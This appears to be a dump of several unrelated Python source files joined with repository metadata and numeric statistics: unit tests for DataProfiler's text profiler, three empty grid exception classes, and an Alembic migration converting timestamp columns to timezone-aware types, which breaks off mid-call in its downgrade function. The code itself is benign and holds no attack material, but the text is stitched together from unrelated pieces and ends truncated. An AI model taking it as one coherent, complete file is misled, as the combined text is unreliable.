az85252/DataProfiler
|
1303abe04b48fa87c67d8d9b3a13f8cb88e79afb
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import pandas as pd
from dataprofiler.profilers.unstructured_text_profile import TextProfiler
from dataprofiler.profilers.profiler_options import TextProfilerOptions
class TestUnstructuredTextProfile(unittest.TestCase):
def test_text_profile_update_and_name(self):
text_profile = TextProfiler("Name")
sample = pd.Series(["Hello my name is: Grant.!!!",
"Bob and \"Grant\", 'are' friends"])
text_profile.update(sample)
self.assertEqual("Name", text_profile.name)
def test_vocab(self):
text_profile = TextProfiler("Name")
sample = pd.Series(["Hello my name is: Grant.!!!",
"Bob and \"Grant\", 'are' friends"])
text_profile.update(sample)
profile = text_profile.profile
# Assert vocab is correct
expected_vocab = [' ', '!', '"', "'", ',', '.', ':', 'B', 'G', 'H',
'a', 'b', 'd', 'e', 'f', 'i', 'l', 'm', 'n', 'o',
'r', 's', 't', 'y']
self.assertListEqual(sorted(expected_vocab), sorted(profile['vocab']))
# Update the data again
sample = pd.Series(["Grant knows how to code",
"Grant will code with Bob"])
text_profile.update(sample)
profile = text_profile.profile
# Assert vocab is correct
expected_vocab = [' ', '!', '"', "'", ',', '.', ':', 'B', 'G', 'H',
'a', 'b', 'c', 'd', 'e', 'f', 'h', 'i', 'k', 'l',
'm', 'n', 'o', 'r', 's', 't', 'w', 'y']
self.assertListEqual(sorted(expected_vocab), sorted(profile['vocab']))
def test_words_and_word_count(self):
text_profile = TextProfiler("Name")
sample = pd.Series(["Hello my name is: Grant.!!!",
"Bob and \"Grant\", 'are' friends"])
text_profile.update(sample)
profile = text_profile.profile
# Assert words is correct and stop words are not present
expected_words = ['Hello', 'name', 'Grant', 'Bob', 'friends']
self.assertListEqual(expected_words, profile['words'])
self.assertNotIn("is", profile['words'])
# Assert word counts are correct
expected_word_count = {'Hello': 1, 'name': 1, 'Grant': 2, 'Bob': 1,
'friends': 1}
self.assertDictEqual(expected_word_count, profile['word_count'])
# Update the data again
sample = pd.Series(["Grant knows how to code",
"Grant will code with Bob"])
text_profile.update(sample)
profile = text_profile.profile
# Assert words is correct and stop words are not present
expected_words = ['Hello', 'name', 'Grant', 'Bob', 'friends', 'knows',
'code']
self.assertListEqual(expected_words, profile['words'])
self.assertNotIn("with", profile['words'])
# Assert word counts are correct
expected_word_count = {'Hello': 1, 'name': 1, 'Grant': 4, 'Bob': 2,
'friends': 1, 'knows': 1, 'code': 2}
self.assertDictEqual(expected_word_count, profile['word_count'])
def test_sample_size(self):
text_profile = TextProfiler("Name")
sample = pd.Series(["Hello my name is: Grant.!!!",
"Bob and \"Grant\", 'are' friends"])
text_profile.update(sample)
# Assert sample size is accurate
self.assertEqual(2, text_profile.sample_size)
# Update the data again
sample = pd.Series(["Grant knows how to code",
"Grant will code with Bob"])
text_profile.update(sample)
# Assert sample size is accurate
self.assertEqual(4, text_profile.sample_size)
def test_timing(self):
text_profile = TextProfiler("Name")
sample = pd.Series(["Hello my name is: Grant.!!!",
"Bob and \"Grant\", 'are' friends"])
text_profile.update(sample)
profile = text_profile.profile
# Assert timing is occurring
self.assertIn("vocab", profile["times"])
self.assertIn("words", profile["times"])
def test_merge_profiles(self):
text_profile1 = TextProfiler("Name")
sample = pd.Series(["Hello my name is: Grant.!!!"])
text_profile1.update(sample)
text_profile2 = TextProfiler("Name")
sample = pd.Series(["Bob and \"Grant\", 'are' friends"])
text_profile2.update(sample)
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
self.assertEqual("Name", text_profile3.name)
# Assert sample size is accurate
self.assertEqual(2, text_profile3.sample_size)
# Assert vocab is correct
expected_vocab = [' ', '!', '"', "'", ',', '.', ':', 'B', 'G', 'H',
'a', 'b', 'd', 'e', 'f', 'i', 'l', 'm', 'n', 'o',
'r', 's', 't', 'y']
self.assertListEqual(sorted(expected_vocab), sorted(profile['vocab']))
# Assert words is correct and stop words are not present
expected_words = ['Bob', 'Grant', 'friends', 'Hello', 'name']
self.assertCountEqual(expected_words, profile['words'])
self.assertNotIn("is", profile['words'])
# Assert word counts are correct
expected_word_count = {'Hello': 1, 'name': 1, 'Grant': 2, 'Bob': 1,
'friends': 1}
self.assertDictEqual(expected_word_count, profile['word_count'])
# Assert timing is occurring
self.assertIn("vocab", profile["times"])
self.assertIn("words", profile["times"])
def test_case_sensitivity(self):
text_profile1 = TextProfiler("Name")
text_profile1._is_case_sensitive = False
sample = pd.Series(["Hello my name is: Grant.!!!"])
text_profile1.update(sample)
profile = text_profile1.profile
expected_word_count = {'grant': 1, 'hello': 1, 'name': 1}
self.assertDictEqual(expected_word_count, profile['word_count'])
text_profile2 = TextProfiler("Name")
sample = pd.Series(["Bob and \"Grant\", 'are' friends"])
text_profile2.update(sample)
profile = text_profile2.profile
expected_word_count = {'Grant': 1, 'Bob': 1, 'friends': 1}
self.assertDictEqual(expected_word_count, profile['word_count'])
with self.assertWarnsRegex(UserWarning,
"The merged Text Profile will not be case sensitive since there"
" were conflicting values for case sensitivity between the two "
"profiles being merged."):
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
# Assert word counts are correct
expected_word_count = {'hello': 1, 'name': 1, 'grant': 2, 'bob': 1,
'friends': 1}
self.assertDictEqual(expected_word_count, profile['word_count'])
# change the merge order
with self.assertWarnsRegex(UserWarning,
"The merged Text Profile will not be case sensitive since there"
" were conflicting values for case sensitivity between the two "
"profiles being merged."):
text_profile3 = text_profile2 + text_profile1
profile = text_profile3.profile
# Assert word counts are correct
expected_word_count = {'hello': 1, 'name': 1, 'grant': 2, 'bob': 1,
'friends': 1}
self.assertDictEqual(expected_word_count, profile['word_count'])
def test_merge_most_common_chars_count(self):
### default values of most common chars for both profiles
text_profile1 = TextProfiler("Name")
sample1 = pd.Series(["this is test,", " this is a test sentence"])
text_profile1.update(sample1)
text_profile2 = TextProfiler("Name")
sample2 = pd.Series(["this is", "this"])
text_profile2.update(sample2)
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
# as merged profile's vocab_count length is None, it is set to
# the length of the merged vocab_count, which is 10
expected_vocab_count = {'s': 10, 't': 9, ' ': 8, 'i': 7, 'e': 5,
'h': 4, 'n': 2, ',': 1, 'a': 1, 'c': 1}
self.assertDictEqual(expected_vocab_count, profile["vocab_count"])
### one profile has default values of most common chars
### the other profile has it set
text_profile1._top_k_chars = 3
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
# as merged profile's vocab_count length is None, it is set to
# the length of the merged vocab_count, which is 10
expected_vocab_count = {'s': 10, 't': 9, ' ': 8, 'i': 7, 'e': 5,
'h': 4, 'n': 2, ',': 1, 'a': 1, 'c': 1}
self.assertDictEqual(expected_vocab_count, profile["vocab_count"])
### equal number of most common chars
text_profile1._top_k_chars = 3
text_profile2._top_k_chars = 3
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
expected_vocab_count = {'s': 10, 't': 9, ' ': 8}
self.assertDictEqual(expected_vocab_count, profile["vocab_count"])
### different number of most common chars
text_profile1._top_k_chars = 2
text_profile2._top_k_chars = 3
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
expected_vocab_count = {'s': 10, 't': 9, ' ': 8}
self.assertDictEqual(expected_vocab_count, profile["vocab_count"])
def test_merge_most_common_words_count(self):
### default values of most common words for both profiles
text_profile1 = TextProfiler("Name")
text_profile1._stop_words = set() # set stop_words to empty for easy inspection
sample1 = pd.Series(["this is test,", " this is a test sentence"])
text_profile1.update(sample1)
text_profile2 = TextProfiler("Name")
text_profile2._stop_words = set() # set stop_words to empty for easy inspection
sample2 = pd.Series(["this is", "this"])
text_profile2.update(sample2)
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
# as merged profile's word_count length is None, it is set to
# the length of the merged word_count, which is 5
expected_word_count = {'this': 4, 'is': 3, 'test': 2, 'a': 1, 'sentence': 1}
self.assertDictEqual(expected_word_count, profile["word_count"])
### one profile has default values of most common words
### the other profile has it set
text_profile1._top_k_words = 3
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
# as merged profile's word_count length is None, it is set to
# the length of the merged word_count, which is 5
expected_word_count = {'this': 4, 'is': 3, 'test': 2, 'a': 1, 'sentence': 1}
self.assertDictEqual(expected_word_count, profile["word_count"])
### equal number of most common words
text_profile1._top_k_words = 3
text_profile2._top_k_words = 3
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
expected_word_count = {'this': 4, 'is': 3, 'test': 2}
self.assertDictEqual(expected_word_count, profile["word_count"])
### different number of most common words
text_profile1._top_k_words = 2
text_profile2._top_k_words = 3
text_profile3 = text_profile1 + text_profile2
profile = text_profile3.profile
expected_word_count = {'this': 4, 'is': 3, 'test': 2}
self.assertDictEqual(expected_word_count, profile["word_count"])
def test_text_profile_with_wrong_options(self):
with self.assertRaisesRegex(ValueError,
"TextProfiler parameter 'options' must be of type"
" TextProfilerOptions."):
TextProfiler("Name", options="wrong_data_type")
def test_options_default(self):
options = TextProfilerOptions()
# input with one sample
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test, a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'sentence': 1, 'Test': 1, 'test': 1}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
# input with two samples
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test,", " a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'sentence': 1, 'Test': 1, 'test': 1}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
def test_options_case_sensitive(self):
# change is_case_sensitive, other options remain the same as default values
options = TextProfilerOptions()
options.is_case_sensitive = False
# input with one sample
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test, a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'sentence': 1, 'test': 2}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
# input with two samples
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test,", " a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'sentence': 1, 'test': 2}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
def test_options_stop_words(self):
# change stop_words, other options remain the same as default values
# with a list of stopwords
options = TextProfilerOptions()
options.stop_words = ['hello', 'sentence', 'is', 'a']
## input with one sample
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test, a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'This': 1, 'Test': 1, 'test': 1}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
## input with two samples
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test,", " a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'This': 1, 'Test': 1, 'test': 1}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
# with an empty list
options = TextProfilerOptions()
options.stop_words = []
## input with one sample
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test, a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'This': 1, 'is': 1, 'test': 1, 'a': 1,
'Test': 1, 'sentence': 1}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
## input with two samples
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test,", " a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'This': 1, 'is': 1, 'test': 1, 'a': 1,
'Test': 1, 'sentence': 1}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
def test_options_vocab_update(self):
# change vocab.is_enabled, other options remain the same as default values
options = TextProfilerOptions()
options.vocab.is_enabled = False
# input with one sample
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test, a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'sentence': 1, 'Test': 1, 'test': 1}
expected_vocab = dict()
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
# input with two samples
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test,", " a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {'sentence': 1, 'Test': 1, 'test': 1}
expected_vocab = dict()
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
def test_options_words_update(self):
# change words.is_enabled, other options remain the same as default values
options = TextProfilerOptions()
options.words.is_enabled = False
# input with one sample
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test, a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
# input with two samples
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["This is test,", " a Test sentence.!!!"])
text_profile.update(sample)
expected_word_count = {}
expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
self.assertDictEqual(expected_word_count, text_profile.word_count)
self.assertDictEqual(expected_vocab, text_profile.vocab_count)
def test_options_most_common_chars_count(self):
# None value for number of common chars
options = TextProfilerOptions()
options.top_k_chars = None
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["this is test,", " this is a test sentence",
"this is", "this"])
text_profile.update(sample)
profile = text_profile.profile
expected_vocab_count = {'s': 10, 't': 9, ' ': 8, 'i': 7, 'e': 5,
'h': 4, 'n': 2, ',': 1, 'a': 1, 'c': 1}
self.assertDictEqual(expected_vocab_count, profile["vocab_count"])
# set number of common chars to 3
options.top_k_chars = 3
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["this is test,", " this is a test sentence",
"this is", "this"])
text_profile.update(sample)
profile = text_profile.profile
expected_vocab_count = {'s': 10, 't': 9, ' ': 8}
self.assertDictEqual(expected_vocab_count, profile["vocab_count"])
# change number of common chars
options.top_k_chars = 2
text_profile = TextProfiler("Name", options=options)
text_profile.update(sample)
profile = text_profile.profile
expected_vocab_count = {'s': 10, 't': 9}
self.assertDictEqual(expected_vocab_count, profile["vocab_count"])
# change number of common chars greater than length of vocab_counts list
options.top_k_chars = 300
text_profile = TextProfiler("Name", options=options)
text_profile.update(sample)
profile = text_profile.profile
expected_vocab_count = {'s': 10, 't': 9, ' ': 8, 'i': 7, 'e': 5,
'h': 4, 'n': 2, ',': 1, 'a': 1, 'c': 1}
self.assertDictEqual(expected_vocab_count, profile["vocab_count"])
def test_options_most_common_words_count(self):
# None value for number of common words
options = TextProfilerOptions()
options.top_k_words = None
options.stop_words = [] # set stop_words to empty list for easy inspection
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["this is test,", " this is a test sentence",
"this is", "this"])
text_profile.update(sample)
profile = text_profile.profile
expected_word_count = {'this': 4, 'is': 3, 'test': 2, 'a': 1,
'sentence': 1}
self.assertDictEqual(expected_word_count, profile["word_count"])
# set number of common words to 3
options.top_k_words = 3
options.stop_words = [] # set stop_words to empty list for easy inspection
text_profile = TextProfiler("Name", options=options)
sample = pd.Series(["this is test,", " this is a test sentence",
"this is", "this"])
text_profile.update(sample)
profile = text_profile.profile
expected_word_count = {'this': 4, 'is': 3, 'test': 2}
self.assertDictEqual(expected_word_count, profile["word_count"])
# change number of common words
options.top_k_words = 2
text_profile = TextProfiler("Name", options=options)
text_profile.update(sample)
profile = text_profile.profile
expected_word_count = {'this': 4, 'is': 3}
self.assertDictEqual(expected_word_count, profile["word_count"])
# change number of common words greater than length of word_counts list
options.top_k_words = 10
text_profile = TextProfiler("Name", options=options)
text_profile.update(sample)
profile = text_profile.profile
expected_word_count = {'this': 4, 'is': 3, 'test': 2, 'a': 1,
'sentence': 1}
self.assertDictEqual(expected_word_count, profile["word_count"])
| 44.542593
| 88
| 0.585665
| 2,877
| 24,053
| 4.709767
| 0.055961
| 0.079557
| 0.067749
| 0.047528
| 0.914686
| 0.888708
| 0.874686
| 0.862657
| 0.84679
| 0.828856
| 0
| 0.023226
| 0.280422
| 24,053
| 539
| 89
| 44.625232
| 0.759649
| 0.108386
| 0
| 0.82337
| 0
| 0
| 0.131838
| 0
| 0
| 0
| 0
| 0
| 0.184783
| 1
| 0.046196
| false
| 0
| 0.01087
| 0
| 0.059783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b0a7b31e9d628829949c386ed303a873f88160b
| 158
|
py
|
Python
|
gridworlds/grid_exceptions.py
|
ryanmccauley211/gridworld
|
bca2e4894c10b9b8e2462e97b754b39248fe4f06
|
[
"MIT"
] | null | null | null |
gridworlds/grid_exceptions.py
|
ryanmccauley211/gridworld
|
bca2e4894c10b9b8e2462e97b754b39248fe4f06
|
[
"MIT"
] | null | null | null |
gridworlds/grid_exceptions.py
|
ryanmccauley211/gridworld
|
bca2e4894c10b9b8e2462e97b754b39248fe4f06
|
[
"MIT"
] | null | null | null |
class GridOutOfBoundsException(Exception):
pass
class GridGenerateException(Exception):
pass
class InvalidDimensionsException(Exception):
pass
| 15.8
| 44
| 0.791139
| 12
| 158
| 10.416667
| 0.5
| 0.312
| 0.288
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151899
| 158
| 10
| 45
| 15.8
| 0.932836
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d2bfc8513e0ee171ec34c9dff101d8bdf4052b71
| 21,962
|
py
|
Python
|
server/kraken/migrations/versions/42ea01a6cf31_convert_timestamps_to_with_timezones.py
|
fossabot/kraken-3
|
7ac472de8ff6f44aac4dbd231f896f00e6f3b278
|
[
"Apache-2.0"
] | 66
|
2020-08-14T12:52:39.000Z
|
2022-03-31T13:56:25.000Z
|
server/kraken/migrations/versions/42ea01a6cf31_convert_timestamps_to_with_timezones.py
|
kinsanras/kraken
|
3938ee4e65ba8f67ec5ee0e912b43fad84548f2c
|
[
"Apache-2.0"
] | 110
|
2020-07-23T07:12:09.000Z
|
2022-03-26T05:54:18.000Z
|
server/kraken/migrations/versions/42ea01a6cf31_convert_timestamps_to_with_timezones.py
|
kinsanras/kraken
|
3938ee4e65ba8f67ec5ee0e912b43fad84548f2c
|
[
"Apache-2.0"
] | 4
|
2021-03-10T05:25:03.000Z
|
2022-01-24T10:12:33.000Z
|
"""convert timestamps to with timezones
Revision ID: 42ea01a6cf31
Revises: ce05198f524a
Create Date: 2021-06-26 23:50:50.271191
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '42ea01a6cf31'
down_revision = 'ce05198f524a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('agents', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('agents', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('agents', 'last_seen',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('agents', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('agents_groups', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('agents_groups', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('agents_groups', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('branches', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('branches', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('branches', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('flows', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('flows', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('flows', 'finished',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('flows', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('jobs', 'assigned',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('jobs', 'completed',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('jobs', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('jobs', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('jobs', 'finished',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('jobs', 'processing_started',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('jobs', 'started',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('jobs', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('projects', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('projects', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('projects', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('repo_changes', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('repo_changes', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('repo_changes', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('runs', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('runs', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('runs', 'email_sent',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('runs', 'finished',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('runs', 'finished_again',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('runs', 'hard_timeout_reached',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('runs', 'soft_timeout_reached',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('runs', 'started',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('runs', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('secrets', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('secrets', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('secrets', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('stages', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('stages', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('stages', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('steps', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('steps', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('steps', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('test_cases', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('test_cases', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('test_cases', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('tools', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('tools', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('tools', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('user_sessions', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('user_sessions', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('user_sessions', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('users', 'created',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
op.alter_column('users', 'deleted',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=True)
op.alter_column('users', 'updated',
existing_type=postgresql.TIMESTAMP(),
type_=sa.DateTime(timezone=True),
existing_nullable=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('users', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('users', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('users', 'created',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('user_sessions', 'updated',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=False)
op.alter_column('user_sessions', 'deleted',
existing_type=sa.DateTime(timezone=True),
type_=postgresql.TIMESTAMP(),
existing_nullable=True)
op.alter_column('user_sessions', 'created',
